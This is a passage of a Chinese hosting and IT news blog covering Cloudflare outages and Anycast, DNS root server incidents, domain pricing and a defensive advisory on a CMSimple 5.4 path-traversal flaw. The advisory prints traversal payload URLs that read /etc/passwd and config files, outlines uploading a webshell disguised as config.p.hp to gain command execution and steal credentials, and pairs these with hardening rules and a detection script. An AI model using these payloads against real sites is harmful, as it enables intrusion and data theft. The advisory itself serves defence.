Cloudflare是一家美国的跨国科技企业,总部位于旧金山,在英国伦敦亦设有办事处。Cloudflare以向客户提供网站安全管理、性能优化及相关的技术支持为主要业务。通过基于反向代理的内容分发网络(CDN, Content Delivery Network)、任播(Anycast)技术 [1]  、基于nginx+lua架构的Web应用防火墙(WAF, Web Application Firewall) [2]  及分布式域名解析服务(Distributed Domain Name Server)等技术,Cloudflare可以帮助受保护站点抵御包括分布式拒绝服务攻击(DDoS, Distributed Denial of Service)在内的大多数网络攻击,确保该网站长期在线,同时提升网站的性能、访问速度以改善访客体验。 #### Cloudflare故障了只因路由泄露 影响无数网站运行 Cloudflare是一家为众多网站提供性能和安全的知名公司,今天早上它本身遇到了网络问题,在此过程中殃及众多客户的网站和应用程序。受影响的公司包括:播客应用Overcast、聊天服务Discord、托管服务提供商WP Engine、电子商务托管提供商Sonassi、公共互联网前端CDN服务CDNJS以及许多其他公司,包括依赖网络主机托管的网站,或与Cloudflare合作、享用其CDN服务的网站。 据Cloudflare声称,它发现路由泄露可能在影响一些Cloudflare IP地址范围,现正在努力解决这个问题。 Cloudflare称,问题最初是在美国东部时间早上7点02分左右发现的,随后很快明确了问题。 该公司在美国东部时间上午8为34分称:“这次泄露影响了包括Cloudflare在内的许多互联网服务。我们会继续与导致该路由泄漏的网络提供商合作将其删除。” 是的。Cloudflare现在有点问题...... 最新消息:该公司在协调世界时中午12点42分/美国东部时间上午8点42分称,问题已解决: #### Cloudflare的节点为什么这么少 不是全球吗? 最近,在论坛看到一个很意思的问题,一位站长吐嘈Cloudflare的CDN节点少,只有5-6个。 其实,这是因为Cloudflare使用了一种国内CDN非常羡慕的技术任播(Anycast)技术。 该技术的好处之一就是可以把全球各地的节点路由融合成一个IP,使得不管哪个国家,只要Cloudflare在当地有服务器的,访问这个IP响应速度跟直接本地IP一个速度。所以我们在ping Cloudflare节点IP的时候,会发现Cloudflare的节点全球各地响应的贼快(除了中国大陆,因为Cloudflare中国大陆是没有节点的)。 任播(Anycast)技术是一种非常适用于抗攻击的技术,如果遭到DDOS流量攻击,会把攻击流量引入就近的机房,分散攻击流量,是一种真正意义上的流量分发技术,而不是像普通CDN这种,暴露就近节点IP,使得黑客只需攻击当地IP就可以影响CDN的正常使用。 我们国内由于法律法规问题,还有运营商之间的融合问题,并不支持这类技术,实在太可惜。 #### cloudflare自选指定IP节点教程 cloudflare是国外一家非常有名的高防CDN服务商,提供免费并不限量的DDOS防御服务,收费套餐也不是很贵,所以市场占有率极高。国内也有不少小伙伴们在用,不过由于没有国内节点,而且缺乏监管,cloudflare的节点经常会被国内屏蔽掉,无法访问。 所以这个时候自选节点非常重要,今天主机吧就来教大家如何自选cloudflare节点。 1.注册登陆cloudflare并添加域名 有钱的开收费套餐,没钱的用免费 2.添加或导入解析 3.到域名管理处修改cloudflare的DNS 4.以上都是cloudflare的正常接入流程,然后我们等cloudflare验证接入后,我们再把域名DNS改回原来的DNS, 这么做的原因是为了下面可以自选IP解析。 5.查询找选用合适的cloudflare的IP节点 cloudflare用的是任播(Anycast)技术CDN,所以不管你域名解析他的哪个节点,都是可以正常访问,通用的。所以我们只需要知道cloudflare的IP库,然后自己选一个认为速度稳定性比较好的节点就可以了。 cloudflare的IP段白名单地址:https://www.cloudflare.com/ips-v4 比如我们选用172.67.209.188节点,电信本地测试ping值在180MS左右 6.选用成功后我们进入原来的域名解析,直接解析选用的cloudflare IP即可。 7.解析后我们等1小时左右,再本地ping下,是不是直接解析指定的IP了呢? 好了,以上就是cloudflare自选IP节点的全部教程,如果对你有帮助的,点个赞,分享加收藏,谢谢! #### Cloudflare软件更新搞瘫全球 F、E 根服务器瘫痪、BGP路由 一番调查让人们对关于私有vs公共Web管理提出了严峻问题。 据互联网系统联盟(ISC)本周发布的一份报告显示,Cloudflare发布的软件存在一处bug,结果导致互联网基础设施的核心部分出现故障。 ISC运行所谓的F根(F root)服务器,这是全球的13台根DNS服务器之一,它们被标记为A到M。这些服务器是支撑全球互联网的中央计算机:比如说,它们确保你在访问yuntoutiao.com时,被定向到为我们的主页提供服务的正确系统。 今年1月23日,ISC接到了反映.net域出故障的报告。它在调查后发现缺失了关键的A记录和AAAA记录,而这些记录负责将.net域名与IPv4和IPv6网络地址绑定起来。 实际上,所有以.net结尾的互联网地址从ISC的F根服务器统统消失了,.net是互联网上数量最多的注册域名之一,共有1340万个域名。最终依靠F根服务器连接到众多网站和服务的任何浏览器、应用程序、计算机或设备都将无法通过其.net地址访问那些系统,这是最糟糕的情况。 这个问题也不仅仅局限于ISC的F根服务器。报告声称,美国宇航局(NASA)运营的E根服务器也遇到了类似的问题。 错误修正版从响应时间表来看,ISC在5分钟内迅速搞清楚了情况:问题出在它与Cloudflare合作运营的互联网节点上,于是将该问题上报给了这家互联网基础设施公司。Cloudflare也很快采取了行动,它在21分钟内就查明了罪魁祸首是发布的特定代码,该代码旨在修复四小时前带入的一个bug。不过报告话锋一转,提到了脆弱不堪的边界网关协议(BGP):互联网错综复杂的庞大网络使用BGP,自动组织管理对方,并保持彼此之间的连接。不管怎样,花了近两个小时的时间才撤回了导致该问题的BGP通告(BGP announcement),ISC特别指出这项工作本应该更快地完成。该报告在“汲取的经验教训”部分写道:“回想起来,一旦发现在提供不完整/不正确的数据,我们本应该立即从BGP撤回路由前缀。”报告继续称:“撤回路由并没有按预期的顺利进行,于是Cloudflare和ISC同意执行常规的测试以实施这项功能……测试套件已经更新,添加了针对缺失的A记录和AAAA记录的测试,ISC和Cloudflare将竭力设计进一步的一致性测试。”资金当道,稳定性靠边由于全球DNS的工作方式,信息通过名称服务器、冗余配置和缓存的分布式层次结构一路向下传输,并且每隔几小时到几秒钟全局更新一次,对网民的影响绝对最小。由于E根服务器和F根服务器暂时瘫痪,众多浏览器和应用程序就只好寻找另外的途径来查询.net地址。然而事态很严重,这主要是由于公共互联网的全球寻址系统的底层基础部分居然被一家私人公司一次不起眼的软件更新搞砸了。进行软件更新的是Cloudflare,这家商业组织结合使用开源软件和闭源软件。尽管数十年来迎来了急剧发展,互联网还是获得了如此超长的正常运行时间,这还得归功于它奉行的传统:使用开源软件,认真细致地检查和测试更新,维护者组织不受商业考量因素的干扰。正如一名资深的互联网工程师Bill Woodcock在Twitter上特别指出:“当公共互联网的关键功能被征用以牟取私人公司的利益时,会发生什么?透明度和问责制丧失殆尽,基础设施支出削减,系统坏掉。”这个问题也不是学术问题。Woodcock最近就.org拟定出售给一家不知名的私募股权公司发出了警告——他公司为管理.org的互联网注册机构提供技术后端服务。鉴于拟议收购者出于获利的动机,他得出结论:技术支出可能会大幅缩减,这使得这个重要域名注册机构的稳定性令人堪忧。他就此问题写信给DNS监管组织ICANN,建议应停止这次拟议的出售。他也不是唯一对此表示关切的互联网工程师。Bert Hubert的公司开发开源DNS软件,对于这份ISC报告他特别指出:“闭源Cloudflare软件存在的一个错误导致了闭源Akamai在美国一家大型有线接入提供商出现崩溃。”断点Hubert最近大声疾呼,他担心Firefox会使用Cloudflare作为其安全DNS:DNS-over-HTTPS(DoH)协议的默认提供商:最近,Mozilla已开始向美国的所有Firefox用户启用加密的DoH。如果Cloudflare闭源软件中的软件错误会导致根服务器使互联网中整个很重要的部分销声匿迹,那么某个时候类似的问题很可能会导致Firefox用户失去安全DNS连接。而这可能会导致他们完全失去互联网(互联网仍会存在,但是大多数用户根本不知道原因是什么或如何解决问题。)互联网工程师常常重复一句著名的话:“互联网把审查制度解释为破坏,并绕过它”,这句话最初由电子前沿基金会(EFF)联合创始人John Gilmore首次提出来。这句话具有极为广泛的含义,常常被工程师们用来基本上表示“别为此而担心,互联网一直在坏掉。”互联网每分每秒在坏掉,但几乎立即自行修复过来。但是随着互联网的商业化气息越来越浓,以逐利为目的的私人公司日益介入互联网基础设施的基础层,ISC针对该F根服务器事件的报告很可能为今后出现的状况敲响了警钟。Cloudflare的发言人驳斥了关于应归咎于其软件是闭源性质的任何说法Cloudflare的工程师Martin Levy称:“那是一个很极端的案例。用非此即彼的角度(即开源是好的,闭源是坏的)看待这个问题有失公允。我们为开源世界贡献了大量的软件。”他称,Cloudflare对即将部署的软件进行了“极其严格的测试,但我们没有注意到这个特殊的情况”;任何破坏是“非常局部性的”。简而言之,当初更改代码是为了替某个客户改进字符编码处理,却没想到引发了连锁反应。在我们看来,BGP路由故障似乎导致了根服务器放弃其gTLD A和AAAA记录,这可能是由于它们从再也无法访问的另一个系统获取那些详细信息。请参阅报告的最后两页。此外,这影响了由F根服务器和E根服务器处理的所有域名,而不仅仅是.net域名,不过.net在ISC看来很显眼,因为它是互联网上相当庞大而重要的一部分。        #### Cloudflare:第三季度全球 DDoS 攻击创纪录增长 44% 11月8日消息:据ZDNet报道,Cloudflare发布了第三季度全球DDoS攻击趋势报告,为一个创纪录水平的季度画上了句号,该季度发生了多起针对VoIP服务的破坏性攻击。 该季度全球 DDoS 攻击数量达到了创纪录的水平,增长44%,期间出现过几次创纪录的 HTTP DDoS 攻击,达到 TB 级别,最高可达1720万 rps(每秒请求次数)。根据Cloudflare的研究,总体而言,世界各地的DDoS攻击增加了44%,而中东和非洲的攻击平均增加了80%,处于领先地位。 Cloudflare 表示,摩洛哥在第三季度经历了全球最大规模的 DDoS 攻击,这期间每100个数据包中有3个属于 DDoS 攻击。虽然 SYN 和 RST 是攻击者使用的主要方式,但是该公司发现 DTLS 攻击数量激增,环比增长3549%。 #### CMSimple目录遍历漏洞曝光:老旧CMS系统潜藏RCE风险,数万网站面临安全威胁 CMSimple目录遍历漏洞曝光:老旧CMS系统潜藏RCE风险,数万网站面临安全威胁 漏洞信息速览 漏洞编号:CVE-2021-43741影响产品:CMSimple CMSimple 5.4漏洞类型:目录遍历 → 远程代码执行危害等级:高(影响机密性、完整性、可用性三重安全属性)公开日期:2026年1月8日当前状态:厂商尚未发布修复补丁利用条件:无需身份验证,远程攻击者即可利用 漏洞技术深度分析 漏洞成因:路径过滤机制失效 CMSimple作为一个轻量级内容管理系统,其核心问题在于“未能正确地过滤资源或文件路径中的特殊元素”。攻击者可以通过构造特殊的文件路径,绕过系统安全检查,实现对服务器文件系统的越权访问。 攻击路径推演 步骤1:发现目标 攻击者扫描网络,识别使用CMSimple 5.4的网站 (特征:特定文件结构、默认页面特征) 步骤2:构造恶意请求 利用目录遍历Payload访问敏感文件: https://target.com/?file=../../../etc/passwd https://target.com/plugins/..%2f..%2f..%2fconfig.php 步骤3:文件上传绕过 将恶意文件伪装成合法文件上传: - 将webshell命名为config.p.hp - 利用路径遍历特性放置在可执行目录 - 通过正常请求触发恶意代码执行 步骤4:远程代码执行 访问恶意文件,获取服务器控制权限: - 执行系统命令 - 窃取数据库凭证 - 植入持久化后门 漏洞特殊性:从目录遍历到RCE的完整链 大多数目录遍历漏洞仅能导致信息泄露,但此漏洞的特殊性在于: 文件重命名权限:攻击者可更改文件名为config.p.hp PHP执行上下文:特定目录下的文件可能被当作PHP执行 组合利用可能:与其他漏洞结合可提升攻击效果 影响范围评估 直接受影响版本 CMSimple 5.4(官方明确列出版本) 可能影响:5.x系列其他版本(需进一步验证) 潜在受影响网站数量 基于CMSimple的市场定位(轻量级、简易CMS): 估算依据: 1. CMSimple历史普及度:曾在中小型网站中流行 2. 版本统计:部分老旧网站可能未升级 3. 技术特征:使用简单、维护不频繁的网站倾向于此系统 保守估计:全球仍有5,000-10,000个网站使用受影响版本 典型用户群体风险 小型企业官网:技术维护能力有限,漏洞修复滞后 个人博客/作品集:可能已长期无人维护 内部管理系统:未暴露在公网但存在内网风险 教育机构简单网站:预算有限,使用免费CMS 紧急防护方案 临时缓解措施(立即执行) 方案一:文件权限加固 # 1. 限制敏感目录访问权限 chmod 750 /path/to/cmsimple/ chmod 640 /path/to/cmsimple/config*.php # 2. 防止文件上传执行 find /path/to/cmsimple/ -name "*.php" -type f -exec chmod 440 {} \; # 3. 禁用危险函数(php.ini修改) disable_functions = exec,passthru,shell_exec,system,proc_open,popen # 4. 设置open_basedir限制 open_basedir = "/var/www/html:/tmp" 方案二:Web服务器配置防护 # Nginx配置文件添加规则 location ~* \.php$ { # 禁止目录遍历特征 if ($request_uri ~* "\.\.") { return 403; } # 限制config相关文件访问 location ~* /config\.(php|p\.hp|inc) { deny all; } # 仅允许特定PHP文件执行 location ~* ^/(index|admin)\.php$ { fastcgi_pass unix:/var/run/php-fpm.sock; include fastcgi_params; } # 其他PHP文件一律拒绝 deny all; } 长期解决方案 1. 系统升级或迁移 选项A:等待官方补丁(风险高,时间不确定) 选项B:升级到其他CMS系统(推荐): - WordPress:生态丰富,安全更新及时 - Joomla:功能强大,适合中型网站 - Grav:现代扁平文件CMS,无需数据库 2. Web应用防火墙配置 # 云防护WAF规则配置示例 规则名称:CMSimple目录遍历防护 匹配条件: - URI 包含 ".." 或 "%2e%2e" 或 "../" - 或 URI 包含 "config.p.hp" - 或 User-Agent 包含 "CMSimple" 且访问异常路径 处置动作:拦截 优先级:高 规则名称:CMSimple敏感文件保护 匹配条件: - 文件扩展名 包含 "php" - 且 URI路径 包含 "config" 或 "admin" - 且 Referer 不存在 或 Referer 不包含本站域名 处置动作:JS挑战 → 拦截 漏洞验证与检测 自查脚本 <?php /** * CMSimple目录遍历漏洞检测脚本 * 保存为check_cmsimple.php并在网站根目录运行 */ $test_vectors = [ '/?file=../../../etc/passwd', '/index.php?p=..%2f..%2fconfig.php', '/plugins/filemanager/..%2f..%2f..%2findex.php' ]; $base_url = 'http://' . $_SERVER['HTTP_HOST']; foreach ($test_vectors as $vector) { $url = $base_url . $vector; $response = @file_get_contents($url); if ($response !== false) { if (strpos($response, 'root:') !== false || strpos($response, '<?php') !== false || strlen($response) > 1000) { echo "漏洞可能存在: " . htmlspecialchars($vector) . "\n"; echo "响应长度: " . strlen($response) . " 字符\n\n"; } } } // 检查CMSimple版本 if (file_exists('cmsimple/config.php')) { $content = file_get_contents('cmsimple/config.php'); if (strpos($content, "CMSimple_VERSION") !== false) { preg_match("/CMSimple_VERSION.*['\"]([0-9.]+)['\"]/", $content, $matches); if (!empty($matches[1])) { $version = $matches[1]; echo "检测到CMSimple版本: " . $version . "\n"; if (version_compare($version, '5.5', '<')) { echo "警告:此版本可能存在漏洞!\n"; } } } } ?> 日志监控关键词 # 实时监控攻击尝试 tail -f /var/log/nginx/access.log | grep -E "(\.\.|%2e%2e|config\.p\.hp)" | \ while read line; do echo "可能的目录遍历攻击: $line" # 可添加自动封禁逻辑 ip=$(echo $line | awk '{print $1}') iptables -A INPUT -s $ip -j DROP 2>/dev/null done 事件响应流程 发现被攻击后(黄金1小时) 第1-15分钟:确认与隔离 □ 立即备份当前网站文件和数据库(取证需要) □ 临时关闭网站或启用维护模式 □ 检查是否有异常文件(特别是config.p.hp变体) 第16-30分钟:影响评估 □ 查看服务器访问日志,确定入侵时间 □ 检查数据库是否有异常数据 □ 扫描网站目录中的可疑PHP文件 □ 修改所有相关密码(数据库、FTP、后台) 第31-60分钟:清除与恢复 □ 从干净备份恢复网站文件 □ 删除攻击者创建的所有文件 □ 更新所有组件到最新版本 □ 部署防护规则,防止二次攻击 修复验证清单 □ 目录遍历Payload测试全部失败 □ config.p.hp等变体文件无法访问 □ 文件上传功能已严格限制 □ 服务器日志无异常访问记录 □ 已部署WAF防护规则 □ 员工收到安全意识提醒 深度安全建议 对于仍需要使用CMSimple的用户 1. 最小权限原则 - Web服务器用户仅需读权限 - 上传目录禁用PHP执行 - 数据库用户仅授予必要权限 2. 文件监控部署 - 使用inotify监控核心文件变化 - 设置文件完整性检查(如AIDE) - 定期审计文件权限 3. 网络层隔离 - 后台管理限制IP访问 - 使用VPN访问管理界面 - 部署云WAF作为额外防护层 通用CMS安全实践 定期更新原则:即使小型CMS也需关注安全更新 备份验证:定期测试备份文件的恢复能力 最小安装:仅启用必要的插件和功能 监控告警:设置异常访问的实时告警 安全评估:每季度进行一次安全扫描 主机帮防护方案 【百度云防护WAF专业版】针对性防护 针对此漏洞的预置规则: 1. 目录遍历防护规则组 - 检测../、..\、%2e%2e等变体 - 深度解码检测绕过尝试 - 结合路径标准化分析 2. CMSimple特定规则 - 识别CMSimple指纹 - 防护config.p.hp相关访问 - 监控敏感文件操作 3. 虚拟补丁功能 - 在官方修复前提供防护 - 不影响正常业务使用 - 可自定义防护强度 【服务器安全加固服务】 服务内容: 1. 漏洞专项修复 - 分析现有CMSimple安装 - 实施安全配置加固 - 部署监控与防护措施 2. 持续安全监控 - 7×24小时异常行为监测 - 定期漏洞扫描 - 应急响应支持 3. 迁移协助 - 评估替代CMS方案 - 平滑迁移数据 - 确保迁移后安全 总结与提醒 CMSimple目录遍历漏洞(CVE-2021-43741)是一个典型的“老旧系统遗留漏洞”,虽然影响的是相对陈旧的CMS版本,但由于部分网站长期缺乏维护,仍面临实际风险。 关键要点: 立即行动:检查是否使用CMSimple 5.4,立即采取防护措施 纵深防御:不要依赖单一防护,建立多层安全体系 持续监控:老旧系统更需要主动监控,而非被动响应 升级规划:考虑迁移到更活跃维护的CMS系统 特别警示:由于厂商尚未发布补丁,使用该版本CMSimple的网站将持续暴露在风险中。除了技术防护外,也应考虑法律和合规风险,特别是涉及用户数据的网站。 主机帮提供免费漏洞检测服务:如果您不确定自己的网站是否使用受影响版本的CMSimple,或需要专业的加固建议,我们可以提供免费的安全扫描和配置审查。在网络安全领域,预防的成本总是远低于事故后的恢复成本。 #### CNAME接入百度云加速域名解析时提示TXT与@记录冲突解决办法 相信很多刚接入百度云加速的朋友都会遇到百度云加速提供的TXT记录解析是与本来的@记录是有冲突的,根本添加不上去。 那么要如何解决这个问题呢? 其实百度云加速的TXT记录作用只是做域名所有权验证而以。也就是一但域名通过验证可以删掉。 知道这个原理后我们在解析的时候可以先把其它@主机记录的解析删除掉,然后添加百度云加速TXT记录。 等百度云加速后台显示验证通过后,我们再删了TXT,解析其它@主机记录就可以了。 #### cnbeta.com可能真的要凉了,域名被暂停,目前彻底无半访问 之前主机吧有报道过,cnbeta暂停国内访问事件,原因是域名备案掉了,海外还是可以访问的。 但是,今天主机吧发现,cnbeta海外也无法访问了,全球各地已经无法访问了。 主机吧查询后发现cnbeta域名是被域名商暂停解析了,而他的域名注册是国内顶级域名注册商35互联。 有传言是因为网站广告上含有政治内容导致被注销备案,目前来看似乎更严重了,域名注册商都暂停解析了,应该是网信办处理的。 国内做网站雷区很多,一但踩雷,网站就报废了,多年努力就白费了,cnbeta是主机吧一直喜欢浏览的IT资讯网站,没想到也中招,希望尽快恢复吧。 #### cnblogs(博客园)可能要凉了 博客园创办于2004年是一个专注于开发者的知识分享和交流平台,提供各种编程语言、技术框架、算法、人工智能等方面的文章。 巅峰时曾经是国内最火的开发者平台,日活跃用户超过十万,这样的一个开发者平台,目前已经走到了生死关头了。 与绝大多数网站一样,博客园随着国内互联网环境的变化,目前平台活跃用户已经一日不如一日。 官方去年开始曾发布过求救公告,并开通会员制度,不过效果很低,因为吸引力实在太少了。 今年的7月15号的时候,博客园再发公告求救,再次呼吁大家买会员,可见博客园是真的急了。 其实主机帮也有一个博客园的博客,不过已经很少维护了,原因是博客园的访问量实在太少了,发的东西几乎没人看。 主机帮并不看好博客园,主要原因是博客园新的内容很少,其次是界面很过时,网站可逛的地方很少。 而作为博客园的竞争对手csdn,目前却活得非常好,内容百度等搜索引擎排名很高,新出的C知道AI问答主机帮挺喜欢用的。 主机帮希望网站都活着,但目前国内互联网这个情况,网站如果不求改变的话,很难生存了。 #### CNNIC发布2020年度域名注册服务机构服务水平评定 12月9日消息:日前中国互联网络信息中心(CNNIC)发布了2020年度国家顶级域名注册服务机构服务水平评定结果。7家注册服务机构获得“五星级注册服务机构”,7家获得“专项奖”。 据介绍,CNNIC从“专业、服务、责任”角度出发,通过对基本情况、业务推广水平、客户服务水平、技术保障水平、年度重点工作等指标综合评估,从71家国内注册服务机构中,评选出2020年度五星级域名注册服务机构。同时,CNNIC针对社会责任、安全保障、服务规范、用户满意度、创新应用、市场推广等方面设置了专项奖,以表彰专项领域成果突出的注册服务机构。 为进一步加强知识产权保护,满足企业保护品牌相关国家顶级域名的实际需求,2021年以来,CNNIC联合注册服务机构开展了国家顶级域名品牌保护服务试点工作,企业可将其已注册的商标作为关键词,保护性注册与之相关的CN域名,并对相关域名禁止配置解析。据了解,试点期间,包括VIVO、小米、腾讯等知名企业对涉及的相关品牌国家顶级域名进行了保护性注册,进一步完善了企业知识产权保护与布局。品牌保护服务计划于2022年正式推出,届时将服务于更多企业,推动其知识产权保护,进一步保障国家顶级域名用户权益。 以下为获得五星级注册服务机构名单: 厦门易名科技股份有限公司 阿里云计算有限公司 北京新网数码信息技术有限公司 厦门纳网科技股份有限公司 成都西维数码科技有限公司 腾讯云计算(北京)有限责任公司 浙江贰贰网络有限公司 以下为获得专项奖的注册服务机构名单: 最佳安全保障奖:浙江贰贰网络有限公司 最佳规范高效奖:腾讯云计算(北京)有限责任公司 最佳推广普及奖:上海美橙科技信息发展有限公司 最具社会责任奖:厦门易名科技股份有限公司 最具发展潜力奖:遵义中域智科网络技术有限公司 最佳创新应用奖:厦门纳网科技有限公司 最佳年度专项奖:成都西维数码科技有限公司 #### CNNIC报告:中国网民近八成月收入5000元以下 你拖后腿了吗 日前,中国互联网络信息中心(CNNIC)发布的最新报告显示,截至2017年12月,中国网民规模达7.72亿,其中近八成月收入5000元以下。 终于和人民群众站在了一起!终于榜上有名! 我是第一次在统计收入的报告里,站在大多数人的类别里。。。 回归正题:国内域名总数同比相对减少,但“.CN”域名总数实现了1.2%的增长,达到2085万个。国内网站总数共计533万个,“.CN”下网站数为315万个。而网络支付群体也不容小觑,用户规模达5.31亿,其中手机端支付增长迅速,达到5.27亿。伴随网站、网页、移动互联网接入流量与APP数量等应用迅速发展,增长比例显著提高。 7.72亿的中国网民 97.5%却用着手机上网,移动互联网已经彻底压过PC互联网了。移动互联网时代谁存在感越差,落后的越快,谁转型快,谁先赢。 附:《中国互联网络发展状况统计报告》全文下载 #### CN域名不安全,18年前注册的域名都可能被收回 最近,国内资深域名投资人沈平透露:他18年前注册的2个CN域名被强制回收,并质疑CN域名的公信力。 起因是沈平2006年和2007年我手工注册的CN域名(caifang.cn和zijue.com.cn),续费到2025年。 十几年后,阿里云收购工程师告诉他这两个域名是保留域名,不让过户。 不过,还是给申请过户的,只是手续有点麻烦。 其实域名管理机构是权收回域名所有权,分别为: (1)域名是“保留域名”列表,因为CNNIC会不定期更新这个列表,沈老板的域名可能就是因为这个被列入列表里了。 (2)注册者不符合资质要求,CN域名的实名认证很严,比如有些人名下有几千个域名或个人信息不真实的,域名也可能会被回收。 (3)被人投诉了,申请仲裁也会被回收。 (4)管局操作失误,这种情况也有,但极少。 CN域名其实有点段黑历史,曾经为了推广CN域名,搞起1元注册活动,当时CN域名一度成为世界上第二大注册量的域名后缀,后来出现了大量域名被强制回收,停止解析的情况,甚至最后弄出现实名注册,导致很多人抛弃了CN域名,主机帮当时也注册了一个域名CX361,当时拿来做QQ资源类的网站,结果无故被停止解析了,说是管局要求的,申诉也没用,当时挺生气的,从此就没有碰过.cn的域名了。 毕竟域名是相当于网站的门牌号,对网站来说,没有什么比域名更重要了,辛辛苦苦干了几年,网站刚有起色,就被各种理由停止了,那亏大发了。 #### Coinbase6000账户疑似遭遇社工攻击 Coinbase 刚刚向大约 6000 名客户发去了通知,原因是有人在未经授权的情况下访问了他们的加密货币交易账户。尽管 Coinbase 没有发现内网被渗透的证据,但该交易所还是已经开始向受影响的客户全额赔偿损失。后续调查让该公司怀疑,攻击者或许通过了社工手段,利用双因素身份验证的漏洞而得逞。 作为目前客户基数最大、访问性最简易的加密货币交易平台之一,树大招风的它也难逃被不法分子盯上的命运。 TechSpot 指出,黑客涉嫌通过社会工程手段来获取用户信息,并利用安全消息服务(SMS)漏洞绕过了 Coinbase 的多因素身份验证。 最终结果是,约 6000 名 Coinbase 客户的账户遭遇了未经授权的访问,并导致其资金被转移到未知地址。 事后推测,Coinbase 认为黑客通过网络钓鱼等方式收集到了客户的邮件地址、密码和电话号码,然后通过请求并获取受感染客户的双因素身份验证令牌,而顺利登录了他们的账户。 今年 3 月至 5 月 20 日期间,Coinbase 客户开始陆续收到有关违规行为的警报,辅以事情是如何发生、正在采取哪些措施、以及如何妥善保护其账户信息的提醒。 Coinbase 表示,补偿工作正在进行中,所有受影响的客户将陆续收到。此外他们建议客户使用更安全的多因素身份验证工具来增强安全性,例如基于硬件的安全密钥、或身份验证器 App 。 当然,本次躺枪并不是 Coinbase 面临的第一轮考验。早在 2019 年,该交易所就被迫向 3400 多名用户披露其注册信息被存储在了纯文本的日志中。 大约在同一时间,报道称该交易所挫败了利用受损学术电子邮件地址的高度复杂攻击。今年,Coinbase 还向用户发送了 12.5 万封电子邮件,误称其双因素身份验证设置已被更改。 #### com.cn域名值得买吗 .com.cn域名价值分析 .com.cn域名,即中国国际顶级域名,是ICANN认证中心针对中国重磅推出的一款新的域名后缀,现在已经成为具有广泛影响力的中文网络标识之一。 根据搜索结果,.com.cn域名的价值主要取决于其品质和市场需求。早期的互联网企业、传统企业网站很多都用的是.com.cn域名,例如:sina.com.cn、alibaba.com.cn、zol.com.cn、TCL.com.cn、icbc.com.cn等等,那个时候,.com.cn才是域名的标准后缀。在IE6时代,在浏览器的地址栏输入域名前缀,再按“ctrl”“回车”键就可以直接访问一个.com.cn的网址。 然而,到了2003年,.cn域名开放个人注册,大批量的优秀.cn域名被个人站长和投资者抢注,一时间.cn域名大放异彩。虽然有人开始嫌.com.cn的尾巴太长了,但是这依然不影响她在国内企业用户心中的地位。 目前,.com.cn域名可能呈现两个极端,即优质的依然有好价格,而品相一般或稍差的则可能不被认可,甚至被放弃。 总的来说,.com.cn域名的价值主要取决于其品质和市场需求,以及其在用户心中的地位。对于中小投资者来说,可以根据自身情况决定投资方向。 以上分析仅供参考,具体购买和投资决策还需要根据市场情况和个人需求进行判断。 #### com域名今年又涨价!net域名续费突破105元/年 根据阿里云最新公告称 2025年5月7日域名涨价,涵盖绝大部分主域名域名,如COM、CN、TOP、CC、site等后缀域名,其中NET域名更是突破100元,达到105元/年 具体调价的后缀如下: 按阿里云的说法调价析原因是调价原因是域名上游成本上调、汇率波动及域名合规治理成本增加导致。 COM、NET等国际域名涨价主机帮不意外,因为中美关税战以及顶级域名服务商Verisign的独家垄断,导致这几年年涨价已经习以为常了,但是,连CN域名都涨价,主机帮着实没想到,要知道CN域名可是我们国家的域名啊,什么汇率啊,上游成本都是扯,唯一可能的是治理成本。 这域名年年上涨,国内网站也不好过,主机吧保守估计现在国内的网站连2020年巅峰期一半都不到了,这里面有行情不好的原因,有AI崛起,搜索没落的原因,也有视频APP火热大家不爱看网站的原因,总之这域名上涨,简直是给还在做网站的同学雪上加霜。 主机帮手上有四个域名,为此还特地每个续两年,这一整下来,一千多块没了,实在难顶。 #### COM域名涨价了,2022年9 月1 日起涨价 com域名是全球使用量最大的域名,这是一种国际上商业域名,也意味着这个域名的运营商是以盈利为目的的,此前COM域名已经多次涨价了,今年9月1又涨一次。 最近威瑞信(COM注册局)宣布自2022明年9 月1 日起,.com域名的批发注册费将从 $8.39 美元(≈¥53.2元)上涨至 $8.97 美元(≈¥56.9元);即每个新域名或续订域名额外增加 0.58 美元。 届时国内域名代理商(阿里云、西部数码、新网)肯定会随之而涨,一年续费78十肯定的了。 想想十年前,一个COM域名注册也才30多,甚至有些20多就可以注册一年了,续费也才40 50这样,不过当年的30价值可比现在78十要贵的。 不过域名这玩意涨价就挺没道理的,毕竟现在域名注册每年都在涨,而且运营不需要什么成本,美国佬几乎是躺赚全世界的钱啊。 据称美国政府和 ICANN 签署,根据合同规定,允许(威瑞信)再增加两次 7% 的年度价格上涨;也就是说,在未来的2023年-2024年,.com域名的价格仍有可能逐年上涨7%。 .com域名可以一次性最多续费10年,为避免广大站长成本支出,大家可以考虑在9月1日之前,一次性续费10年。 或者主机吧建议申请CN域名,CN域名虽然是中国国家域名,但是是国内很受欢迎,注册续费价格也相对便宜,当然对内容管理也是严格的,如果你的网站内容不过关的话,不要注册。 #### CoreOS服务器系统配置Docker镜像加速器方法 本篇文章主要介绍了CoreOS配置Docker镜像加速器的方法,CoreOS下的Docker配置是通过flannel unit来实现的,主机吧觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随主机吧过来看看吧CoreOS下的Docker配置是通过flannel unit来实现的通过命令可以看出配置文件的默认位置systemctl cat docker # /run/systemd/system/docker.service[Unit] Requires=torcx.target After=torcx.target Description=Docker Application Container Engine Documentation=http://docs.docker.com After=containerd.service docker.socket network-online.target Wants=network-online.target Requires=containerd.service docker.socket [Service] EnvironmentFile=/run/metadata/torcx Type=notify EnvironmentFile=-/run/flannel/flannel_docker_opts.env Environment=DOCKER_SELINUX=--selinux-enabled=true /run/flannel/flannel_docker_opts.env这个文件默认是没有的,所以我们创建对应目录和文件即可。然后编辑文件内容如下:vi flannel_docker_opts.envDOCKER_OPTS="--registry-mirror=https://xxxxx.mirror.aliyuncs.com"保存后,启动docker服务即可systemctl daemon-reloadsystemctl restart docker最后验证一下ps aux |grep dockerroot   831 1.3 0.8 272276 32908 ?   Ssl 16:55 0:00 /run/torcx/bin/dockerd --host=fd:// --containerd=/var/run/docker/libcontainerd/docker- containerd.sock --selinux-enabled=true --registry-mirror=https://xxxxx.mirror.aliyuncs.com 这样就成功了,很简单吧。以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支主机吧。 #### CSDN 旗下 开源代码托管平台GitCode 被曝批量搬运 Github 项目 6 月 27 日消息,CSDN 推出的开源代码托管平台 GitCode 日前被曝批量搬运 Github 项目,甚至将原始项目中 readme 文件中的 Github 地址都替换为 GitCode,还为开发者“贴心”注册了同名账号。 在 GitCode 官方社区,昨日到今日有多条 Issues 